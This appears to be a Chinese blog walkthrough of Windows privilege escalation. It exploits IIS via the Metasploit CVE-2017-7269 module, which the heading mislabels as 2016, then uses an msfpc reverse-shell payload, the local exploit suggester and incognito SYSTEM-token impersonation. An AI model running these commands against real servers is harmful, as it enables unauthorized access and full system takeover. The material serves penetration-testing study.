首页

# Windows 内核提权

Cve-2016-7269 低权限提权

第一种方法

利用模块进行渗透

1
2
3
use exploit/windows/iis/cve-2017-7269
set rhosts IP
exploit

image-20210320163403824

发现是 windows 低权限,限免进行提权

# 生成 exe 上传反弹木马

生成反弹木马

1
2
3
msfpc windows 本地IP 3333
mv windows-*.exe 1.exe
msfconsole -r windows-*exe.rc

image-20210320172549963

image-20210320163555815

上传 1.exe 到 C:/1 / 下,进行反弹

1
execute -f 1.exe

image-20210320163856952

image-20210320163757983

1
利用run post/multi/recon/local_exploit_suggester 查看可利用模块

image-20210320165533159

image-20210320164413649

获得 windows 高权限

# 扩展方法

# 令牌提权

image-20210320171633846

低权限令牌提权

1
2
3
4
5
use incognito # 加载窃取令牌模块
list_tokens -u # 查看可用的用户令牌
list_tokens -g # 查看可用的用户组令牌
impersonate_token 'NT AUTHORITY\SYSTEM' # 假冒 SYSTEM token
rev2self #返回原始 token

image-20210320165555084

更新于

请我喝[茶]~( ̄▽ ̄)~*

chun 微信支付

微信支付

chun 支付宝

支付宝